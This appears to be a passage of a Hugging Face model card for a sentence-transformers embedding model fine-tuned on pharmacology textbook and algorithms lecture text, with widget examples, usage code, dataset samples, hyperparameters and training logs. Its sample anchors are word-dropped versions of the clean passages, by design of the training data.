erythromycin, fosamprenavir, indinavir, metronida- zole, rimantadine, tigecycline
1Except ceftriaxone. 2Except doxycycline and possibly minocycline. 3Except antistaphylococcal
penicillins (eg, nafcillin and dicloxacillin). 4Except moxifloxacin. Conditions
That Alter Antimicrobi
- 'of the integrity of membranes in cells and organelles. A. Nervous System The
developing central nervous system of the fetus and young child is the most sensitive
target organ for lead’s toxic effect. Epidemiologic studies suggest that blood
lead concentrations even less than 5 mcg/dL may result in subclinical deficits
in neurocog- nitive function in lead-exposed young children, with no demon- strable
threshold for a “no effect” level. The dose response between TABLE 57–1 Toxicology
of selected arsenic, lead, and mercury compounds. Form Entering Body Major Route
of Absorption Distribution Major Clinical Effects Key Aspects of Mechanism Metabolism
and Elimination Arsenic Inorganic arsenic salts Gastrointestinal, respiratory
(all mucosal surfaces) Predominantly soft tissues (highest in liver, kidney).
Avidly bound in skin, hair, nails Cardiovascular: shock, arrhythmias. CNS: encephalopathy,
peripheral neuropathy. Gastroenteritis; pan- cytopenia; cancer (many sites) Inhibits
enzymes; interferes with oxidative phosphorylation; alters cell signaling, gene
expression Methylation. Renal (major); sweat and feces (minor) Lead Inorganic
lead oxides and salts Gastrointestinal, respiratory Soft tissues; redistributed
to skeleton (> 90% of adult body burden) CNS deficits; peripheral neuropathy;
ane- mia; nephropathy; hypertension; reproductive toxicity Inhibits enzymes; interferes
with essential cations; alters membrane structure Renal (major); feces and breast
milk (minor) Organic (tetraethyl lead) Skin, gastrointesti- nal, respiratory Soft
tissues, especially liver, CNS Encephalopathy Hepatic dealkylation (fast) → trialkyme-
tabolites (slow) → dissociation to lead Urine and feces (major); sweat (minor)
Mercury Elemental mercury Respiratory tract Soft tissues, especially kidney, CNS
CNS: tremor, behavioral (erethism); gingivo'
- 708 SECTION VII Endocrine Drugs marked adverse effects because there is a recovery
period between each dose. The transition to an alternate-day schedule can be made
after the disease process is under control. It should be done gradu- ally and
with additional supportive measures between doses. When selecting a drug for use
in large doses, a medium- or intermediate-acting synthetic steroid with little
mineralocorticoid effect is advisable. If possible, it should be given as a single
morning dose. C. Special Dosage Forms Local therapy, such as topical preparations
for skin disease, oph- thalmic forms for eye disease, intra-articular injections
for joint disease, inhaled steroids for asthma, and hydrocortisone enemas for
ulcerative colitis, provides a means of delivering large amounts of steroid to
the diseased tissue with reduced systemic effects. Beclomethasone dipropionate,
and several other glucocorti- coids—primarily budesonide, flunisolide, and mometasone
furoate, administered as aerosols—have been found to be extremely useful in the
treatment of asthma (see Chapter 20 ). Beclomethasone dipropionate, triamcinolone
acetonide, budes- onide, flunisolide, and mometasone furoate are available as
nasal sprays for the topical treatment of allergic rhinitis. They are effec- tive
at doses (one or two sprays one, two, or three times daily) that in most patients
result in plasma levels that are too low to influ- ence adrenal function or have
any other systemic effects. Corticosteroids incorporated in ointments, creams,
lotions, and sprays are used extensively in dermatology. These preparations are
discussed in more detail in Chapter 61 . MINERALOCORTICOIDS (ALDOSTERONE, DEOXYCORTICOSTERONE,
FLUDROCORTISONE) The most important mineralocorticoid in humans is aldosterone.
However, small amounts of deoxycorticosterone (DOC) are also formed and released.
Although the amount is normally insignifi- cant, DOC was of some importance therapeut
- source_sentence: Antiprotozoal 923 MEFLOQUINE Mefloquine is effective therapy of
other Although toxicity is mefloquine one recommended for most regions with Chemistry
Mefloquine is 4-quinoline methanol is chemically quinine. can given because local
irritation with parenteral and hours. Mefloquine highly uted and treat- regimen.
elimination half-life about 20 allowing dosing chemoprophylaxis. With dos- drug
reached over number of interval can be shortened to 4 with daily doses 250 mg,
this is not and metabolites of in can be in the months completion therapy. Antimalarial
Action & strong P falciparum P is hepatic stages or gametocytes. The of unknown.
Sporadic mefloquine been from areas. At resistance appears to uncommon regions
Asia high rates border areas resis- tance quinine resistance to Clinical in
sentences:
- 938 SECTION VIII Chemotherapeutic Drugs Clinical Uses Albendazole is administered
on an empty stomach when used against intraluminal parasites but with a fatty
meal when used against tissue parasites. A. Ascariasis, Trichuriasis, and Hookworm
and Pinworm Infections For adults and children older than 2 years of age with
ascariasis and hookworm infections, the treatment is a single dose of 400 mg TABLE
53–1 Drugs for the treatment of helminthic infections. 1 Infecting Organism Drug
of Choice Alternative Drugs Roundworms (nematodes) Ascaris lumbricoides (roundworm)
Albendazole or pyrantel pamoate or mebendazole Ivermectin, piperazine Trichuris
trichiura (whipworm) Mebendazole or albendazole Ivermectin Necator americanus
(hookworm); Ancylostoma duodenale (hookworm) Albendazole or mebendazole or pyrantel
pamoate Strongyloides stercoralis (threadworm) Ivermectin Albendazole or thiabendazole
Enterobius vermicularis (pinworm) Mebendazole or pyrantel pamoate Albendazole
Trichinella spiralis (trichinosis) Mebendazole or albendazole; add corticosteroids
for severe infection Trichostrongylus species Pyrantel pamoate or mebendazole
Albendazole Cutaneous larva migrans (creeping eruption) Albendazole or ivermectin
Thiabendazole (topical) Visceral larva migrans Albendazole Mebendazole Angiostrongylus
cantonensis Albendazole or mebendazole Wuchereria bancrofti (filariasis); Brugia
malayi (filariasis); tropical eosinophilia; Loa loa (loiasis) Diethylcarbamazine
Ivermectin Onchocerca volvulus (onchocerciasis) Ivermectin Dracunculus medinensis
(guinea worm) Metronidazole Thiabendazole or mebendazole Capillaria philippinensis
(intestinal capillariasis) Albendazole Mebendazole Flukes (trematodes) Schistosoma
haematobium (bilharziasis)
- CHAPTER 52 Antiprotozoal Drugs 923 MEFLOQUINE Mefloquine is effective therapy
for many chloroquine-resistant strains of P falciparum and against other species.
Although toxicity is a concern, mefloquine is one of the recommended chemopro-
phylactic drugs for use in most malaria-endemic regions with chloroquine-resistant
strains. Chemistry & Pharmacokinetics Mefloquine hydrochloride is a synthetic
4-quinoline methanol that is chemically related to quinine. It can only be given
orally because severe local irritation occurs with parenteral use. It is well
absorbed, and peak plasma concentrations are reached in about 18 hours. Mefloquine
is highly protein-bound, extensively distrib- uted in tissues, and eliminated
slowly, allowing a single-dose treat- ment regimen. The terminal elimination half-life
is about 20 days, allowing weekly dosing for chemoprophylaxis. With weekly dos-
ing, steady-state drug levels are reached over a number of weeks; this interval
can be shortened to 4 days by beginning a course with three consecutive daily
doses of 250 mg, although this is not stan- dard practice. Mefloquine and acid
metabolites of the drug are slowly excreted, mainly in the feces. The drug can
be detected in the blood for months after the completion of therapy. Antimalarial
Action & Resistance Mefloquine has strong blood schizonticidal activity against
P falciparum and P vivax, but it is not active against hepatic stages or gametocytes.
The mechanism of action of mefloquine is unknown. Sporadic resistance to mefloquine
has been reported from many areas. At present, resistance appears to be uncommon
except in regions of Southeast Asia with high rates of multidrug resistance (especially
border areas of Thailand). Mefloquine resis- tance appears to be associated with
resistance to quinine and halofantrine but not with resistance to chloroquine.
Clinical Uses A. Chemoprophylaxis Mefloquine is effective in prophylaxis against
most strain
- the body to colonize various organs in the process called metastasis. Such tumor
stem cells thus can express clonogenic (colony-forming) capability, and they are
characterized by chromosome abnormalities reflecting their genetic instability,
which leads to progressive selection of subclones that can survive more readily
in the multicellular environment of the host. This genetic instability also allows
them to become resistant to chemotherapy and radiotherapy. The invasive and metastatic
processes as well as a series of metabolic abnormalities associated with the cancer
result in tumor-related symptoms and eventual death of the patient unless the
neoplasm can be eradicated with treatment. 54 CAUSES OF CANCER The incidence,
geographic distribution, and behavior of specific types of cancer are related
to multiple factors, including sex, age, race, genetic predisposition, and exposure
to environmental car- cinogens. Of these factors, environmental exposure is probably
most important. Exposure to ionizing radiation has been well documented as a significant
risk factor for a number of cancers, including acute leukemias, thyroid cancer,
breast cancer, lung cancer, soft tissue sarcoma, and basal cell and squamous cell
skin cancers. Chemical carcinogens (particularly those in tobacco smoke) as well
as azo dyes, aflatoxins, asbestos, benzene, and radon have all been well documented
as leading to a wide range of human cancers. Several viruses have been implicated
in the etiology of various human cancers. For example, hepatitis B and hepatitis
C are asso- ciated with the development of hepatocellular cancer; HIV is associated
with Hodgkin’s and non-Hodgkin’s lymphomas; human papillomavirus is associated
with cervical cancer and head and neck cancer; and Ebstein-Barr virus is associated
with nasopharyn- geal cancer. Expression of virus-induced neoplasia may also depend
on additional host and environmental factors that modu- late the transformation
process. Cellular genes are known that are homologous to the transforming genes
of the retroviruses, a family
pipeline_tag: sentence-similarity
library_name: sentence-transformers
---
# SentenceTransformer based on ibm-granite/granite-embedding-107m-multilingual
This is a [sentence-transformers](https://www.SBERT.net) model finetuned from [ibm-granite/granite-embedding-107m-multilingual](https://huggingface.co/ibm-granite/granite-embedding-107m-multilingual). It maps sentences & paragraphs to a 384-dimensional dense vector space and can be used for semantic textual similarity, semantic search, paraphrase mining, text classification, clustering, and more.
## Model Details
### Model Description
- **Model Type:** Sentence Transformer
- **Base model:** [ibm-granite/granite-embedding-107m-multilingual](https://huggingface.co/ibm-granite/granite-embedding-107m-multilingual) <!-- at revision 5c793ec061753b0d0816865e1af7db3f675d65af -->
- **Maximum Sequence Length:** 512 tokens
- **Output Dimensionality:** 384 dimensions
- **Similarity Function:** Cosine Similarity
<!-- - **Training Dataset:** Unknown -->
<!-- - **Language:** Unknown -->
<!-- - **License:** Unknown -->
### Model Sources
- **Documentation:** [Sentence Transformers Documentation](https://sbert.net)
- **Repository:** [Sentence Transformers on GitHub](https://github.com/UKPLab/sentence-transformers)
- **Hugging Face:** [Sentence Transformers on Hugging Face](https://huggingface.co/models?library=sentence-transformers)
### Full Model Architecture
```
SentenceTransformer(
(0): Transformer({'max_seq_length': 512, 'do_lower_case': False}) with Transformer model: XLMRobertaModel
(1): Pooling({'word_embedding_dimension': 384, 'pooling_mode_cls_token': True, 'pooling_mode_mean_tokens': False, 'pooling_mode_max_tokens': False, 'pooling_mode_mean_sqrt_len_tokens': False, 'pooling_mode_weightedmean_tokens': False, 'pooling_mode_lasttoken': False, 'include_prompt': True})
(2): Normalize()
)
```
## Usage
### Direct Usage (Sentence Transformers)
First install the Sentence Transformers library:
```bash
pip install -U sentence-transformers
```
Then you can load this model and run inference.
```python
from sentence_transformers import SentenceTransformer
# Download from the 🤗 Hub
model = SentenceTransformer("RikoteMaster/embedder-granite")
# Run inference
sentences = [
'Antiprotozoal 923 MEFLOQUINE Mefloquine is effective therapy of other Although toxicity is mefloquine one recommended for most regions with Chemistry Mefloquine is 4-quinoline methanol is chemically quinine. can given because local irritation with parenteral and hours. Mefloquine highly uted and treat- regimen. elimination half-life about 20 allowing dosing chemoprophylaxis. With dos- drug reached over number of interval can be shortened to 4 with daily doses 250 mg, this is not and metabolites of in can be in the months completion therapy. Antimalarial Action & strong P falciparum P is hepatic stages or gametocytes. The of unknown. Sporadic mefloquine been from areas. At resistance appears to uncommon regions Asia high rates border areas resis- tance quinine resistance to Clinical in',
'CHAPTER 52 Antiprotozoal Drugs 923 MEFLOQUINE Mefloquine is effective therapy for many chloroquine-resistant strains of P falciparum and against other species. Although toxicity is a concern, mefloquine is one of the recommended chemopro- phylactic drugs for use in most malaria-endemic regions with chloroquine-resistant strains. Chemistry & Pharmacokinetics Mefloquine hydrochloride is a synthetic 4-quinoline methanol that is chemically related to quinine. It can only be given orally because severe local irritation occurs with parenteral use. It is well absorbed, and peak plasma concentrations are reached in about 18 hours. Mefloquine is highly protein-bound, extensively distrib- uted in tissues, and eliminated slowly, allowing a single-dose treat- ment regimen. The terminal elimination half-life is about 20 days, allowing weekly dosing for chemoprophylaxis. With weekly dos- ing, steady-state drug levels are reached over a number of weeks; this interval can be shortened to 4 days by beginning a course with three consecutive daily doses of 250 mg, although this is not stan- dard practice. Mefloquine and acid metabolites of the drug are slowly excreted, mainly in the feces. The drug can be detected in the blood for months after the completion of therapy. Antimalarial Action & Resistance Mefloquine has strong blood schizonticidal activity against P falciparum and P vivax, but it is not active against hepatic stages or gametocytes. The mechanism of action of mefloquine is unknown. Sporadic resistance to mefloquine has been reported from many areas. At present, resistance appears to be uncommon except in regions of Southeast Asia with high rates of multidrug resistance (especially border areas of Thailand). Mefloquine resis- tance appears to be associated with resistance to quinine and halofantrine but not with resistance to chloroquine. Clinical Uses A. Chemoprophylaxis Mefloquine is effective in prophylaxis against most strain',
'the body to colonize various organs in the process called metastasis. Such tumor stem cells thus can express clonogenic (colony-forming) capability, and they are characterized by chromosome abnormalities reflecting their genetic instability, which leads to progressive selection of subclones that can survive more readily in the multicellular environment of the host. This genetic instability also allows them to become resistant to chemotherapy and radiotherapy. The invasive and metastatic processes as well as a series of metabolic abnormalities associated with the cancer result in tumor-related symptoms and eventual death of the patient unless the neoplasm can be eradicated with treatment. 54 CAUSES OF CANCER The incidence, geographic distribution, and behavior of specific types of cancer are related to multiple factors, including sex, age, race, genetic predisposition, and exposure to environmental car- cinogens. Of these factors, environmental exposure is probably most important. Exposure to ionizing radiation has been well documented as a significant risk factor for a number of cancers, including acute leukemias, thyroid cancer, breast cancer, lung cancer, soft tissue sarcoma, and basal cell and squamous cell skin cancers. Chemical carcinogens (particularly those in tobacco smoke) as well as azo dyes, aflatoxins, asbestos, benzene, and radon have all been well documented as leading to a wide range of human cancers. Several viruses have been implicated in the etiology of various human cancers. For example, hepatitis B and hepatitis C are asso- ciated with the development of hepatocellular cancer; HIV is associated with Hodgkin’s and non-Hodgkin’s lymphomas; human papillomavirus is associated with cervical cancer and head and neck cancer; and Ebstein-Barr virus is associated with nasopharyn- geal cancer. Expression of virus-induced neoplasia may also depend on additional host and environmental factors that modu- late the transformation process. Cellular genes are known that are homologous to the transforming genes of the retroviruses, a family',
]
embeddings = model.encode(sentences)
print(embeddings.shape)
# [3, 384]
# Get the similarity scores for the embeddings
similarities = model.similarity(embeddings, embeddings)
print(similarities.shape)
# [3, 3]
```
<!--
### Direct Usage (Transformers)
<details><summary>Click to see the direct usage in Transformers</summary>
</details>
-->
<!--
### Downstream Usage (Sentence Transformers)
You can finetune this model on your own dataset.
<details><summary>Click to expand</summary>
</details>
-->
<!--
### Out-of-Scope Use
*List how the model may foreseeably be misused and address what users ought not to do with the model.*
-->
<!--
## Bias, Risks and Limitations
*What are the known or foreseeable issues stemming from this model? You could also flag here known failure cases or weaknesses of the model.*
-->
<!--
### Recommendations
*What are recommendations with respect to the foreseeable issues? For example, filtering explicit content.*
-->
## Training Details
### Training Dataset
#### Unnamed Dataset
* Size: 34,441 training samples
* Columns: <code>anchor</code> and <code>positive</code>
* Approximate statistics based on the first 1000 samples:
| | anchor | positive |
|:--------|:-----------------------------------------------------------------------------------|:-------------------------------------------------------------------------------------|
| type | string | string |
| details | <ul><li>min: 3 tokens</li><li>mean: 99.93 tokens</li><li>max: 255 tokens</li></ul> | <ul><li>min: 14 tokens</li><li>mean: 245.16 tokens</li><li>max: 512 tokens</li></ul> |
* Samples:
| anchor | positive |
|:-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|:---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| <code>March Lecture Solving using by Svensson1 In this following: We describe Multiplicative Hedge) • We this method to solve is these lecture are on of “Lecture 11 of in 2015” written and Simon Rodriguez and on by Kaul that the lecture previous we to use the majority method order to fairly general with days N experts as For t . , gives advice: 2. advice the expert, of and the decides 4. observes suffers was majority parameterized by ε “learning rate”), now as follows: • each i weight initialized 1. are trustworthy the ning.) each t: • Predict based on w(t) After observing the vector, i expert the lecture we case = following any sequence of i of WM mistake</code> | <code>Advanced Algorithms March 22, 2022 Lecture 9: Solving LPs using Multiplicative Weights Notes by Ola Svensson1 In this lecture we do the following: • We describe the Multiplicative Weight Update (actually Hedge) method. • We then use this method to solve covering LPs. • This is a very fast and simple (i.e., very attractive) method for solving these LPs approximately. These lecture notes are partly based on an updated version of “Lecture 11 of Topics in TCS, 2015” that were written by Vincent Eggerling and Simon Rodriguez and on the lecture notes by Shiva Kaul that we used in the last lecture. 1 Recall last lecture In the previous lecture, we saw how to use the weighted majority method in order to fairly smartly follow the advice of experts. Recall that the general game-setting with T days and N experts was as follows: For t = 1, . . . , T: 1. Each expert i ∈[N] gives some advice: UP or DOWN 2. Aggregator (you) predicts, based on the advice of the expert, UP or DOWN. 3. Adversary, with k...</code> |
| <code>Last ε The same proof the For duration expert i ∈[N], of WM mistakes ε) · (# i’s mistakes) + O(log(N)/ε) 1Disclaimer: notes They not been and may typos,</code> | <code>Last lecture we analyzed the case when ε = 1/2. The same proof gives the following Theorem 1 For any sequence of outcomes, duration T, and expert i ∈[N], # of WM mistakes ≤2(1 + ε) · (# of i’s mistakes) + O(log(N)/ε) . 1Disclaimer: These notes were written as notes for the lecturer. They have not been peer-reviewed and may contain inconsistent notation, typos, and omit citations of relevant works. 1</code> |
| <code>[Sketch] The proof done by potential function: for each = 1, . , 1, Φ(t) = i We lower potential the mistakes of i. We it in of our mistakes. The weight of expert down by a −ε) i does. As weight is 1, Φ(T +1) = +1) ≥w(T +1) = (1 −ε)# of . Every the experts was (since majority weights are (1 −ε). that the factor every time Φ(T −ε/2)# mistakes = N −ε/2)# , equality used that = was initialized with a weight above bounds give us (1 mistakes ≤N · (1 of . sides, allowing for randomized strategies In the exercises, you proved that are instances for weighted This overcome this we allow random instead of always making prediction the to create A is often general is often good the of adversaries. Allowing randomized leads to following with T t . . ,</code> | <code>Proof [Sketch] The proof was done by defining a potential function: for each t = 1, . . . , T + 1, let Φ(t) = X i∈[N] w(t) i . We now lower bound the “final” potential Φ(T +1) using the number of mistakes of i. We then upper bound it in terms of our number of mistakes. Lower bound: The weight of expert i goes down by a factor (1 −ε) for each mistake i does. As the initial weight of i is 1, Φ(T +1) = X j∈[N] w(T +1) j ≥w(T +1) i = (1 −ε)# of i’s mistakes . Upper bound: Every time WM errs, at least half the weight of the experts was wrong (since weighted majority was wrong). These weights are then decreased by (1 −ε). It follows that the potential goes down by at least a factor (1 −ε/2) every time WM errs. And so Φ(T +1) ≤Φ(1) · (1 −ε/2)# of WM mistakes = N · (1 −ε/2)# of WM mistakes , where for the equality we used that Φ(1) = N since each expert was initialized with a weight of 1. The above bounds give us (1 −ε)# of i’s mistakes ≤Φ(T +1) ≤N · (1 −ε/2)# of WM mistakes . Taking logs on b...</code> |
* Loss: [<code>MultipleNegativesRankingLoss</code>](https://sbert.net/docs/package_reference/sentence_transformer/losses.html#multiplenegativesrankingloss) with these parameters:
```json
{
"scale": 20.0,
"similarity_fct": "cos_sim"
}
```
### Evaluation Dataset
#### Unnamed Dataset
* Size: 3,827 evaluation samples
* Columns: <code>anchor</code> and <code>positive</code>
* Approximate statistics based on the first 1000 samples:
| | anchor | positive |
|:--------|:-------------------------------------------------------------------------------------|:-------------------------------------------------------------------------------------|
| type | string | string |
| details | <ul><li>min: 15 tokens</li><li>mean: 174.64 tokens</li><li>max: 266 tokens</li></ul> | <ul><li>min: 55 tokens</li><li>mean: 432.79 tokens</li><li>max: 512 tokens</li></ul> |
* Samples:
| anchor | positive |
|:-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|:---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| <code>CHAPTER 39 Adrenocorticosteroids Adrenocortical Antagonists occurs. of /d of or in intermediate-, long-acting glucocorticoids greater growth-suppressing the steroid in larger than amounts, as cortisone hydrocortisone, which mineralocorticoid effects addition to glucocorticoid and fluid and loss of potassium. patients this a hypokalemic, and in blood pressure. hypoproteinemia, renal disease, liver disease, also occur. In patients with disease, small of may These by using non-salt-retaining and supplements. C. Suppression corticosteroids adrenal suppression occur. weeks the given appropriate at times dosage 24–48 hours) or stress ten-fold for or costeroid dosage be it slowly. If to reduction be slow levels. It take 2–12 to and cortisol may not to normal The suppression not treatment ACTH does time for normal function. the too receiving a certain disorder, the</code> | <code>CHAPTER 39 Adrenocorticosteroids & Adrenocortical Antagonists 707 hypertension also occurs. In dosages of 45 mg/m 2 /d or more of hydrocortisone or its equivalent, growth retardation occurs in children. Medium-, intermediate-, and long-acting glucocorticoids have greater growth-suppressing potency than the natural steroid at equivalent doses. When given in larger than physiologic amounts, steroids such as cortisone and hydrocortisone, which have mineralocorticoid effects in addition to glucocorticoid effects, cause some sodium and fluid retention and loss of potassium. In patients with normal cardiovas- cular and renal function, this leads to a hypokalemic, hypochloremic alkalosis and eventually to a rise in blood pressure. In patients with hypoproteinemia, renal disease, or liver disease, edema may also occur. In patients with heart disease, even small degrees of sodium retention may lead to heart failure. These effects can be minimized by using synthetic non-salt-retaining steroids, ...</code> |
| <code>is a treatment not reduce the return function. dosage rapidly a certain the symptoms the in patients an disorder patients Cushing’s disease) symptoms with rapid symptoms include anorexia, vomit- ing, weight loss, postural reflect true glucocorticoid deficiency, occur in the normal or even plasma levels, sug- gesting glucocorticoids must carefully the hyperglycemia, sodium with edema hypertension, hypokalemia, peptic osteopo- rosis, and and intermittent alternate-day) can on this Even patients may of stress, surgical are or or acci- occur. B. with with peptic hypertension with failure, cer- as varicella tuberculosis, psycho- ses, osteoporosis, Glucocorticoid differ respect relative anti- inflammatory and mineralocorticoid of available ( Table and these factors should be in drug to used. ACTH Adrenocortical Steroids patients normal</code> | <code>is not a pituitary problem, and treatment with ACTH does not reduce the time required for the return of normal function. If the dosage is reduced too rapidly in patients receiving gluco- corticoids for a certain disorder, the symptoms of the disorder may reappear or increase in intensity. However, patients without an underlying disorder (eg, patients cured surgically of Cushing’s disease) also develop symptoms with rapid reductions in cortico- steroid levels. These symptoms include anorexia, nausea or vomit- ing, weight loss, lethargy, headache, fever, joint or muscle pain, and postural hypotension. Although many of these symptoms may reflect true glucocorticoid deficiency, they may also occur in the presence of normal or even elevated plasma cortisol levels, sug- gesting glucocorticoid dependence. Contraindications & Cautions A. Special Precautions Patients receiving glucocorticoids must be monitored carefully for the development of hyperglycemia, glycosuria, sodium retention with ede...</code> |
| <code>( Table and these should be taken in be A. ACTH ACTH used past production to However, when is able, ACTH therapeutic agent has abandoned. which claimed be effective than were due of of were dosage Dosage the regimen physician consider the disease, amount likely to required the effect, therapy. required for the dose to obtain initial the for needed effect be until a small or symptoms is When it is continuously plasma levels to ACTH, paren- preparation oral doses frequent The situation with respect use of inflammatory allergic The same total quantity few be effective many smaller slowly absorbed autoimmune involving organs aggressively, is as treatment. complexes macrophages, of predni- divided doses dosage is serious dosage can gradually large required prolonged time, after control When used manner, large amounts</code> | <code>available ( Table 39–1 ), and these factors should be taken into account in selecting the drug to be used. A. ACTH versus Adrenocortical Steroids In patients with normal adrenals, ACTH was used in the past to induce the endogenous production of cortisol to obtain similar effects. However, except when an increase in androgens is desir- able, the use of ACTH as a therapeutic agent has been abandoned. Instances in which ACTH was claimed to be more effective than glucocorticoids were probably due to the administration of smaller amounts of corticosteroids than were produced by the dosage of ACTH. B. Dosage In determining the dosage regimen to be used, the physician must consider the seriousness of the disease, the amount of drug likely to be required to obtain the desired effect, and the duration of therapy. In some diseases, the amount required for maintenance of the desired therapeutic effect is less than the dose needed to obtain the initial effect, and the lowest possible dosage for th...</code> |
* Loss: [<code>MultipleNegativesRankingLoss</code>](https://sbert.net/docs/package_reference/sentence_transformer/losses.html#multiplenegativesrankingloss) with these parameters:
```json
{
"scale": 20.0,
"similarity_fct": "cos_sim"
}
```
### Training Hyperparameters
#### Non-Default Hyperparameters
- `eval_strategy`: steps
- `per_device_train_batch_size`: 128
- `per_device_eval_batch_size`: 128
- `learning_rate`: 2e-05
- `num_train_epochs`: 5
- `warmup_ratio`: 0.1
- `fp16`: True
- `dataloader_drop_last`: True
- `dataloader_num_workers`: 2
- `load_best_model_at_end`: True
- `push_to_hub`: True
- `hub_model_id`: RikoteMaster/embedder-granite
- `hub_strategy`: end
- `hub_private_repo`: True
#### All Hyperparameters
<details><summary>Click to expand</summary>
- `overwrite_output_dir`: False
- `do_predict`: False
- `eval_strategy`: steps
- `prediction_loss_only`: True
- `per_device_train_batch_size`: 128
- `per_device_eval_batch_size`: 128
- `per_gpu_train_batch_size`: None
- `per_gpu_eval_batch_size`: None
- `gradient_accumulation_steps`: 1
- `eval_accumulation_steps`: None
- `torch_empty_cache_steps`: None
- `learning_rate`: 2e-05
- `weight_decay`: 0.0
- `adam_beta1`: 0.9
- `adam_beta2`: 0.999
- `adam_epsilon`: 1e-08
- `max_grad_norm`: 1.0
- `num_train_epochs`: 5
- `max_steps`: -1
- `lr_scheduler_type`: linear
- `lr_scheduler_kwargs`: {}
- `warmup_ratio`: 0.1
- `warmup_steps`: 0
- `log_level`: passive
- `log_level_replica`: warning
- `log_on_each_node`: True
- `logging_nan_inf_filter`: True
- `save_safetensors`: True
- `save_on_each_node`: False
- `save_only_model`: False
- `restore_callback_states_from_checkpoint`: False
- `no_cuda`: False
- `use_cpu`: False
- `use_mps_device`: False
- `seed`: 42
- `data_seed`: None
- `jit_mode_eval`: False
- `use_ipex`: False
- `bf16`: False
- `fp16`: True
- `fp16_opt_level`: O1
- `half_precision_backend`: auto
- `bf16_full_eval`: False
- `fp16_full_eval`: False
- `tf32`: None
- `local_rank`: 0
- `ddp_backend`: None
- `tpu_num_cores`: None
- `tpu_metrics_debug`: False
- `debug`: []
- `dataloader_drop_last`: True
- `dataloader_num_workers`: 2
- `dataloader_prefetch_factor`: None
- `past_index`: -1
- `disable_tqdm`: False
- `remove_unused_columns`: True
- `label_names`: None
- `load_best_model_at_end`: True
- `ignore_data_skip`: False
- `fsdp`: []
- `fsdp_min_num_params`: 0
- `fsdp_config`: {'min_num_params': 0, 'xla': False, 'xla_fsdp_v2': False, 'xla_fsdp_grad_ckpt': False}
- `fsdp_transformer_layer_cls_to_wrap`: None
- `accelerator_config`: {'split_batches': False, 'dispatch_batches': None, 'even_batches': True, 'use_seedable_sampler': True, 'non_blocking': False, 'gradient_accumulation_kwargs': None}
- `deepspeed`: None
- `label_smoothing_factor`: 0.0
- `optim`: adamw_torch
- `optim_args`: None
- `adafactor`: False
- `group_by_length`: False
- `length_column_name`: length
- `ddp_find_unused_parameters`: None
- `ddp_bucket_cap_mb`: None
- `ddp_broadcast_buffers`: False
- `dataloader_pin_memory`: True
- `dataloader_persistent_workers`: False
- `skip_memory_metrics`: True
- `use_legacy_prediction_loop`: False
- `push_to_hub`: True
- `resume_from_checkpoint`: None
- `hub_model_id`: RikoteMaster/embedder-granite
- `hub_strategy`: end
- `hub_private_repo`: True
- `hub_always_push`: False
- `gradient_checkpointing`: False
- `gradient_checkpointing_kwargs`: None
- `include_inputs_for_metrics`: False
- `include_for_metrics`: []
- `eval_do_concat_batches`: True
- `fp16_backend`: auto
- `push_to_hub_model_id`: None
- `push_to_hub_organization`: None
- `mp_parameters`:
- `auto_find_batch_size`: False
- `full_determinism`: False
- `torchdynamo`: None
- `ray_scope`: last
- `ddp_timeout`: 1800
- `torch_compile`: False
- `torch_compile_backend`: None
- `torch_compile_mode`: None
- `include_tokens_per_second`: False
- `include_num_input_tokens_seen`: False
- `neftune_noise_alpha`: None
- `optim_target_modules`: None
- `batch_eval_metrics`: False
- `eval_on_start`: False
- `use_liger_kernel`: False
- `eval_use_gather_object`: False
- `average_tokens_across_devices`: False
- `prompts`: None
- `batch_sampler`: batch_sampler
- `multi_dataset_batch_sampler`: proportional
</details>
### Training Logs
| Epoch | Step | Training Loss | Validation Loss |
|:---------:|:--------:|:-------------:|:---------------:|
| 0.1859 | 50 | 0.3983 | - |
| 0.3717 | 100 | 0.193 | - |
| 0.5576 | 150 | 0.0828 | - |
| 0.7435 | 200 | 0.0409 | 0.0339 |
| 0.9294 | 250 | 0.0386 | - |
| 1.1152 | 300 | 0.0322 | - |
| 1.3011 | 350 | 0.0311 | - |
| 1.4870 | 400 | 0.0275 | 0.0167 |
| 1.6729 | 450 | 0.0252 | - |
| 1.8587 | 500 | 0.0254 | - |
| 2.0446 | 550 | 0.0254 | - |
| 2.2305 | 600 | 0.0227 | 0.0129 |
| 2.4164 | 650 | 0.0236 | - |
| 2.6022 | 700 | 0.0185 | - |
| 2.7881 | 750 | 0.0234 | - |
| 2.9740 | 800 | 0.0274 | 0.0118 |
| 3.1599 | 850 | 0.0208 | - |
| 3.3457 | 900 | 0.0245 | - |
| 3.5316 | 950 | 0.0242 | - |
| 3.7175 | 1000 | 0.0219 | 0.0112 |
| 3.9033 | 1050 | 0.0239 | - |
| 4.0892 | 1100 | 0.0223 | - |
| 4.2751 | 1150 | 0.0212 | - |
| **4.461** | **1200** | **0.0223** | **0.0107** |
| 4.6468 | 1250 | 0.0228 | - |
| 4.8327 | 1300 | 0.0196 | - |
* The bold row denotes the saved checkpoint.
### Framework Versions
- Python: 3.10.17
- Sentence Transformers: 4.1.0
- Transformers: 4.52.3
- PyTorch: 2.7.0+cu126
- Accelerate: 1.7.0
- Datasets: 3.6.0
- Tokenizers: 0.21.1
## Citation
### BibTeX
#### Sentence Transformers
```bibtex
@inproceedings{reimers-2019-sentence-bert,
title = "Sentence-BERT: Sentence Embeddings using Siamese BERT-Networks",
author = "Reimers, Nils and Gurevych, Iryna",
booktitle = "Proceedings of the 2019 Conference on Empirical Methods in Natural Language Processing",
